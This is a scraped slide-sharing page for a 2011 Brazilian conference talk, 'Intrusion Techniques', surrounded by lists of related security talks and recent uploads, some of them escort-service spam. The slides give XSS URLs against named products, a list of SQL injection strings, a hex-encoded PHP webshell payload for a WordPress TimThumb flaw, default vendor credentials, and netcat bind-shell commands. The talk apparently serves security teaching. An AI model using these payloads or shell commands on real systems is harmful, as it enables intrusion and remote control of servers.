Midiakit SegInfo 2015
 
Convite de Patrocinio Workshop Seginfo 2014 - RJ e BSB
Convite de Patrocinio Workshop Seginfo 2014 - RJ e BSBConvite de Patrocinio Workshop Seginfo 2014 - RJ e BSB
Convite de Patrocinio Workshop Seginfo 2014 - RJ e BSB
 
Midiakit seginfo v05
Midiakit seginfo v05Midiakit seginfo v05
Midiakit seginfo v05
 
Segurança Cibernética – Oportunidades e Desafios na Administração Pública Fed...
Segurança Cibernética – Oportunidades e Desafios na Administração Pública Fed...Segurança Cibernética – Oportunidades e Desafios na Administração Pública Fed...
Segurança Cibernética – Oportunidades e Desafios na Administração Pública Fed...
 
"ENG++: Permutation Oriented Programming" por Nelson Brito
"ENG++: Permutation Oriented Programming" por Nelson Brito"ENG++: Permutation Oriented Programming" por Nelson Brito
"ENG++: Permutation Oriented Programming" por Nelson Brito
 
"A Guerra Cibernética e o novo Hacktivismo" por Anchises M. G. de Paula
"A Guerra Cibernética e o novo Hacktivismo" por Anchises M. G. de Paula"A Guerra Cibernética e o novo Hacktivismo" por Anchises M. G. de Paula
"A Guerra Cibernética e o novo Hacktivismo" por Anchises M. G. de Paula
 
"Atacando e Defendendo Aplicações Web" por Rafael Soares Ferreira, Sócio-Dire...
"Atacando e Defendendo Aplicações Web" por Rafael Soares Ferreira, Sócio-Dire..."Atacando e Defendendo Aplicações Web" por Rafael Soares Ferreira, Sócio-Dire...
"Atacando e Defendendo Aplicações Web" por Rafael Soares Ferreira, Sócio-Dire...
 
"Automated Malware Analysis" de Gabriel Negreira Barbosa, Malware Research an...
"Automated Malware Analysis" de Gabriel Negreira Barbosa, Malware Research an..."Automated Malware Analysis" de Gabriel Negreira Barbosa, Malware Research an...
"Automated Malware Analysis" de Gabriel Negreira Barbosa, Malware Research an...
 
"Projeto MUFFIN de Resposta a Incidentes – Uma receita para causar indigestão...
"Projeto MUFFIN de Resposta a Incidentes – Uma receita para causar indigestão..."Projeto MUFFIN de Resposta a Incidentes – Uma receita para causar indigestão...
"Projeto MUFFIN de Resposta a Incidentes – Uma receita para causar indigestão...
 
A Miopia do CSO por Jordan Bonagura
A Miopia do CSO por Jordan BonaguraA Miopia do CSO por Jordan Bonagura
A Miopia do CSO por Jordan Bonagura
 
"War Games – O que aprender com eles?" por @rafaelsferreira
"War Games – O que aprender com eles?" por @rafaelsferreira "War Games – O que aprender com eles?" por @rafaelsferreira
"War Games – O que aprender com eles?" por @rafaelsferreira
 
Proteja sua Hovercraft: Mantendo sua nave livre dos Sentinelas
Proteja sua Hovercraft: Mantendo sua nave livre dos SentinelasProteja sua Hovercraft: Mantendo sua nave livre dos Sentinelas
Proteja sua Hovercraft: Mantendo sua nave livre dos Sentinelas
 
"How to track people using social media sites" por Thiago Bordini
"How to track people using social media sites" por Thiago Bordini"How to track people using social media sites" por Thiago Bordini
"How to track people using social media sites" por Thiago Bordini
 
por Bruno Milreu Filipe "Casos avançados de teste de invasão – Indo além do “...
por Bruno Milreu Filipe "Casos avançados de teste de invasão – Indo além do “...por Bruno Milreu Filipe "Casos avançados de teste de invasão – Indo além do “...
por Bruno Milreu Filipe "Casos avançados de teste de invasão – Indo além do “...
 
"Desafios em Computação Forense e Resposta a Incidentes de Segurança"?
"Desafios em Computação Forense e Resposta a Incidentes de Segurança"?"Desafios em Computação Forense e Resposta a Incidentes de Segurança"?
"Desafios em Computação Forense e Resposta a Incidentes de Segurança"?
 

Recently uploaded

Data Integration Basics: Merging & Joining Data
Data Integration Basics: Merging & Joining DataData Integration Basics: Merging & Joining Data
Data Integration Basics: Merging & Joining Data
Safe Software
 
IPLOOK Remote-Sensing Satellite Solution
IPLOOK Remote-Sensing Satellite SolutionIPLOOK Remote-Sensing Satellite Solution
IPLOOK Remote-Sensing Satellite Solution
IPLOOK Networks
 
WhatsApp Spy Online Trackers and Monitoring Apps
WhatsApp Spy Online Trackers and Monitoring AppsWhatsApp Spy Online Trackers and Monitoring Apps
WhatsApp Spy Online Trackers and Monitoring Apps
HackersList
 
Using LLM Agents with Llama 3, LangGraph and Milvus
Using LLM Agents with Llama 3, LangGraph and MilvusUsing LLM Agents with Llama 3, LangGraph and Milvus
Using LLM Agents with Llama 3, LangGraph and Milvus
Zilliz
 
(CISOPlatform Summit & SACON 2024) Orientation by CISO Platform_ Using CISO P...
(CISOPlatform Summit & SACON 2024) Orientation by CISO Platform_ Using CISO P...(CISOPlatform Summit & SACON 2024) Orientation by CISO Platform_ Using CISO P...
(CISOPlatform Summit & SACON 2024) Orientation by CISO Platform_ Using CISO P...
Priyanka Aash
 
Dublin_mulesoft_meetup_Mulesoft_Salesforce_Integration (1).pptx
Dublin_mulesoft_meetup_Mulesoft_Salesforce_Integration (1).pptxDublin_mulesoft_meetup_Mulesoft_Salesforce_Integration (1).pptx
Dublin_mulesoft_meetup_Mulesoft_Salesforce_Integration (1).pptx
Kunal Gupta
 
(CISOPlatform Summit & SACON 2024) Digital Personal Data Protection Act.pdf
(CISOPlatform Summit & SACON 2024) Digital Personal Data Protection Act.pdf(CISOPlatform Summit & SACON 2024) Digital Personal Data Protection Act.pdf
(CISOPlatform Summit & SACON 2024) Digital Personal Data Protection Act.pdf
Priyanka Aash
 
"Mastering Graphic Design: Essential Tips and Tricks for Beginners and Profes...
"Mastering Graphic Design: Essential Tips and Tricks for Beginners and Profes..."Mastering Graphic Design: Essential Tips and Tricks for Beginners and Profes...
"Mastering Graphic Design: Essential Tips and Tricks for Beginners and Profes...
Anant Gupta
 
Acumatica vs. Sage Intacct _Construction_July (1).pptx
Acumatica vs. Sage Intacct _Construction_July (1).pptxAcumatica vs. Sage Intacct _Construction_July (1).pptx
Acumatica vs. Sage Intacct _Construction_July (1).pptx
BrainSell Technologies
 
July Patch Tuesday
July Patch TuesdayJuly Patch Tuesday
July Patch Tuesday
Ivanti
 
Use Cases & Benefits of RPA in Manufacturing in 2024.pptx
Use Cases & Benefits of RPA in Manufacturing in 2024.pptxUse Cases & Benefits of RPA in Manufacturing in 2024.pptx
Use Cases & Benefits of RPA in Manufacturing in 2024.pptx
SynapseIndia
 
EuroPython 2024 - Streamlining Testing in a Large Python Codebase
EuroPython 2024 - Streamlining Testing in a Large Python CodebaseEuroPython 2024 - Streamlining Testing in a Large Python Codebase
EuroPython 2024 - Streamlining Testing in a Large Python Codebase
Jimmy Lai
 
Sonkoloniya documentation - ONEprojukti.pdf
Sonkoloniya documentation - ONEprojukti.pdfSonkoloniya documentation - ONEprojukti.pdf
Sonkoloniya documentation - ONEprojukti.pdf
SubhamMandal40
 
Girls Call Churchgate 9910780858 Provide Best And Top Girl Service And No1 in...
Girls Call Churchgate 9910780858 Provide Best And Top Girl Service And No1 in...Girls Call Churchgate 9910780858 Provide Best And Top Girl Service And No1 in...
Girls Call Churchgate 9910780858 Provide Best And Top Girl Service And No1 in...
maigasapphire
 
Acumatica vs. Sage Intacct vs. NetSuite _ NOW CFO.pdf
Acumatica vs. Sage Intacct vs. NetSuite _ NOW CFO.pdfAcumatica vs. Sage Intacct vs. NetSuite _ NOW CFO.pdf
Acumatica vs. Sage Intacct vs. NetSuite _ NOW CFO.pdf
BrainSell Technologies
 
Tailored CRM Software Development for Enhanced Customer Insights
Tailored CRM Software Development for Enhanced Customer InsightsTailored CRM Software Development for Enhanced Customer Insights
Tailored CRM Software Development for Enhanced Customer Insights
SynapseIndia
 
Litestack talk at Brighton 2024 (Unleashing the power of SQLite for Ruby apps)
Litestack talk at Brighton 2024 (Unleashing the power of SQLite for Ruby apps)Litestack talk at Brighton 2024 (Unleashing the power of SQLite for Ruby apps)
Litestack talk at Brighton 2024 (Unleashing the power of SQLite for Ruby apps)
Muhammad Ali
 
Connector Corner: Leveraging Snowflake Integration for Smarter Decision Making
Connector Corner: Leveraging Snowflake Integration for Smarter Decision MakingConnector Corner: Leveraging Snowflake Integration for Smarter Decision Making
Connector Corner: Leveraging Snowflake Integration for Smarter Decision Making
DianaGray10
 
Patch Tuesday de julio
Patch Tuesday de julioPatch Tuesday de julio
Patch Tuesday de julio
Ivanti
 
Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...
Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...
Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...
shanihomely
 

Recently uploaded (20)

Data Integration Basics: Merging & Joining Data
Data Integration Basics: Merging & Joining DataData Integration Basics: Merging & Joining Data
Data Integration Basics: Merging & Joining Data
 
IPLOOK Remote-Sensing Satellite Solution
IPLOOK Remote-Sensing Satellite SolutionIPLOOK Remote-Sensing Satellite Solution
IPLOOK Remote-Sensing Satellite Solution
 
WhatsApp Spy Online Trackers and Monitoring Apps
WhatsApp Spy Online Trackers and Monitoring AppsWhatsApp Spy Online Trackers and Monitoring Apps
WhatsApp Spy Online Trackers and Monitoring Apps
 
Using LLM Agents with Llama 3, LangGraph and Milvus
Using LLM Agents with Llama 3, LangGraph and MilvusUsing LLM Agents with Llama 3, LangGraph and Milvus
Using LLM Agents with Llama 3, LangGraph and Milvus
 
(CISOPlatform Summit & SACON 2024) Orientation by CISO Platform_ Using CISO P...
(CISOPlatform Summit & SACON 2024) Orientation by CISO Platform_ Using CISO P...(CISOPlatform Summit & SACON 2024) Orientation by CISO Platform_ Using CISO P...
(CISOPlatform Summit & SACON 2024) Orientation by CISO Platform_ Using CISO P...
 
Dublin_mulesoft_meetup_Mulesoft_Salesforce_Integration (1).pptx
Dublin_mulesoft_meetup_Mulesoft_Salesforce_Integration (1).pptxDublin_mulesoft_meetup_Mulesoft_Salesforce_Integration (1).pptx
Dublin_mulesoft_meetup_Mulesoft_Salesforce_Integration (1).pptx
 
(CISOPlatform Summit & SACON 2024) Digital Personal Data Protection Act.pdf
(CISOPlatform Summit & SACON 2024) Digital Personal Data Protection Act.pdf(CISOPlatform Summit & SACON 2024) Digital Personal Data Protection Act.pdf
(CISOPlatform Summit & SACON 2024) Digital Personal Data Protection Act.pdf
 
"Mastering Graphic Design: Essential Tips and Tricks for Beginners and Profes...
"Mastering Graphic Design: Essential Tips and Tricks for Beginners and Profes..."Mastering Graphic Design: Essential Tips and Tricks for Beginners and Profes...
"Mastering Graphic Design: Essential Tips and Tricks for Beginners and Profes...
 
Acumatica vs. Sage Intacct _Construction_July (1).pptx
Acumatica vs. Sage Intacct _Construction_July (1).pptxAcumatica vs. Sage Intacct _Construction_July (1).pptx
Acumatica vs. Sage Intacct _Construction_July (1).pptx
 
July Patch Tuesday
July Patch TuesdayJuly Patch Tuesday
July Patch Tuesday
 
Use Cases & Benefits of RPA in Manufacturing in 2024.pptx
Use Cases & Benefits of RPA in Manufacturing in 2024.pptxUse Cases & Benefits of RPA in Manufacturing in 2024.pptx
Use Cases & Benefits of RPA in Manufacturing in 2024.pptx
 
EuroPython 2024 - Streamlining Testing in a Large Python Codebase
EuroPython 2024 - Streamlining Testing in a Large Python CodebaseEuroPython 2024 - Streamlining Testing in a Large Python Codebase
EuroPython 2024 - Streamlining Testing in a Large Python Codebase
 
Sonkoloniya documentation - ONEprojukti.pdf
Sonkoloniya documentation - ONEprojukti.pdfSonkoloniya documentation - ONEprojukti.pdf
Sonkoloniya documentation - ONEprojukti.pdf
 
Girls Call Churchgate 9910780858 Provide Best And Top Girl Service And No1 in...
Girls Call Churchgate 9910780858 Provide Best And Top Girl Service And No1 in...Girls Call Churchgate 9910780858 Provide Best And Top Girl Service And No1 in...
Girls Call Churchgate 9910780858 Provide Best And Top Girl Service And No1 in...
 
Acumatica vs. Sage Intacct vs. NetSuite _ NOW CFO.pdf
Acumatica vs. Sage Intacct vs. NetSuite _ NOW CFO.pdfAcumatica vs. Sage Intacct vs. NetSuite _ NOW CFO.pdf
Acumatica vs. Sage Intacct vs. NetSuite _ NOW CFO.pdf
 
Tailored CRM Software Development for Enhanced Customer Insights
Tailored CRM Software Development for Enhanced Customer InsightsTailored CRM Software Development for Enhanced Customer Insights
Tailored CRM Software Development for Enhanced Customer Insights
 
Litestack talk at Brighton 2024 (Unleashing the power of SQLite for Ruby apps)
Litestack talk at Brighton 2024 (Unleashing the power of SQLite for Ruby apps)Litestack talk at Brighton 2024 (Unleashing the power of SQLite for Ruby apps)
Litestack talk at Brighton 2024 (Unleashing the power of SQLite for Ruby apps)
 
Connector Corner: Leveraging Snowflake Integration for Smarter Decision Making
Connector Corner: Leveraging Snowflake Integration for Smarter Decision MakingConnector Corner: Leveraging Snowflake Integration for Smarter Decision Making
Connector Corner: Leveraging Snowflake Integration for Smarter Decision Making
 
Patch Tuesday de julio
Patch Tuesday de julioPatch Tuesday de julio
Patch Tuesday de julio
 
Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...
Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...
Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...
 

"Intrusion Techniques (Open Source Tools)" por Ewerson Guimarães por

  • 1. Intrusion Techniques DcLabs Hacking Tour 2011 Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 2. повестка дня отпечатков пальцев Веб-ошибок Задняя дверь грубая сила шеллкод Эксплойты Сканеры Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 3. FingerPrint Grab informations about a target host. Ex: It's used to identify Operational System and/or Services(daemon) version number by TCP/IP response's unique characteristics. The best tool for discovery operating systems, services, devices and others: NMAP (Network Mapper) Basic commands: nmap host (Basic) nmap –sV host (Service Versions) nmap –P0 host ( ICMP ECHO-REPLY Ignore) nmap –O host (Try to grab O.S version) nmap –f host (Firewall/IDS/IPS Evasion) Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 4. Passive - FingerPrint • TTL - When the operating system sets the Time To Live on the outbound packet • Window Size - When the operating system sets the Window Size at. • DF - =The operating system set the Don't Fragment bit. • TOS - The operating system set the Type of Service, and if so, at what. Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 6. FingerPrint U. Bourne Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 7. FingerPrint In BackTrack Linux you can find many softwares to Finger-Print Http://www.backtrack-linux.com Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 8. Web Vulnerability These vulnerabilities are initially explored through malicious browser requests compromising the target in a matter of minutes Cross Site (XSS) – Reflected / Stored SQL-Injection PHP (LFI / RFI/ AFU / RCE) Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 9. Web Vulnerability Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client-side script into web pages viewed by other users. Spekx – Knowledge Base - http://server/pls/ksp_acesso.login_script?p_time=%221%22% 3Cscript%3Ealert%28document.cookie%29;%3C/script%3E LMS Web Ensino – TOTVS http://site/lms/sistema/webensino/index.php? modo=resbusca_biblioteca&pChave=a%22%2F%3E+ %3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E &Submit=Buscar Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 10. Web Vulnerability Reflected / Stored Xss DEMO Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 11. Web Vulnerability Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 12. What is the impact? Why? Examples? Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 13. Web Vulnerability SQL-Injection It occurs when the attacker can insert a series of SQL statements within a 'query' by manipulating the data entry application. SELECT campos FROM tabela WHERE campo = 'test@test.com'; Inject string: some' OR 'x'='x SELECT fields FROM table WHERE field = ‘some' OR 'x'='x'; admin'-- " or 0=0 # ' or 1=1-- hi' or 'a'='a ' or 0=0 -- or 0=0 # " or 1=1-- hi') or ('a'='a " or 0=0 -- ' or 'x'='x or 1=1-- hi") or ("a"="a or 0=0 -- " or "x"="x ' or a=a-- ‘);Drop table x;-- ' or 0=0 # ') or ('x'='x hi" or 1=1 -- ') or ('a'='a Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 14. SQL-Injection LIVE DEMO OCOMON Throwing fudge at the fan Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 15. Web Vulnerability CGI/PHP Command Injection It occurs when the attacker insert a series of commands exploiting vulnerable CGI/PHP scripts OneorZero – AFU + LFI http://server/oneorzero/index.php?controller=../[FILE].php WordPress TimThumb (Theme) Plugin – RCE x47x49x46x38x39x61x01x00x01x00x80x00x00 xFFxFFxFFx00x00x00x21xF9x04x01x00x00x00 x00x2Cx00x00x00x00x01x00x01x00x00x02x02 x44x01x00x3Bx00x3Cx3Fx70x68x70x20x40x65 x76x61x6Cx28x24x5Fx47x45x54x5Bx27x63x6D x64x27x5Dx29x3Bx20x3Fx3Ex00 Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 16. Default/Weak passwords Default passwords are set by its manufacturers/developers and were not changed after the installation/configuration. As supplied by the system vendor and meant to be changed at installation time (Nobody do this shit) Ex: Sw 3Com: User: security - Pass: security FireBird: User: sysdba - Pass: masterkey Weak: Passwords that are easily guessed or in a keyboard sequential Ex: 123456 - Love - House´s phone - Birthday - Etc... Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 17. Brute Force It consists in using random combinations of characters/numbers and symbols, wordlists and/or string generators to crack a password Ex: John the Ripper Hydra SSH Brute Force Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 18. Brute Force DirBuster - DirBuster is a multi threaded java application designed to brute force directories and files names on web/application servers Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 19. Exploits Kinds of Exploits: Local: Usually, the objective of a local exploit is to elevate user's privileges on the machine as close as possible to root (uid=0) or administrator. They are written to exploit kernel bugs or suid binaries Remote: It works over a network connection and exploit the vulnerable target without any prior access to it. www.securityfocus.com www.secunia.com www.exploit-db.com 0Days It works usually an unpublished exploit from a brand new found vulnerability. You can buy! $$$$$ Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 20. Exploits If Kernel was patched? Will we cry? Alexos=> Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 21. Exploits No!!!! Fuck him!!! We have others ways to pwn the box GNU C library dynamic linker Suid´s Etc... Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 22. Backdoors/RootKits Used to maintain access to the system We can Netcat use for this purpose: nc –vv –l –p 5555 nc –vv –l –p 5555 –e /bin/bash nc <ip> <port> RootKits The main purpose of a rootkit is to hide the attacker's presence replacing vital system binaries from target's system Example: Hide files (with match strings) Run command when match strings Hide processes Hide open ports, and others. Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 23. Scanners/Fuzzers There are 2 types of scanners: Specific which are written for a specific vulnerability (BSQLHacker, SQLMAP) and Generic which are written for various kinds of vulnerabilities. Generic scanners use known service banners/strings to locate the potential target/vulnerabilities W3af Nessus Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 24. Scanners/Fuzzers Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 25. Scanners/Fuzzers Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 26. Sniffers Sniffer monitors and analyzes network traffic. Some of these packets may contain critical information (such as logins, passwords and cool infos ) WhireShark - Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 27. MetaSploit Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 28. MetaSploit Let´s Fuck Windows? Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 29. Hardening your server HnTool is an open source (GPLv2) hardening tool for Unix. It scans your system for vulnerabilities or problems in configuration files allowing you to get a quick overview of the security status of your system. Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 30. Questions? Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 31. Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 32. Contact Crash - crash@dclabs.com.br Irc: irc.freenode.net #dclabs twitter: @crashbrz Ewerson Guimarães (Crash) DcLabs – HackingTour 2011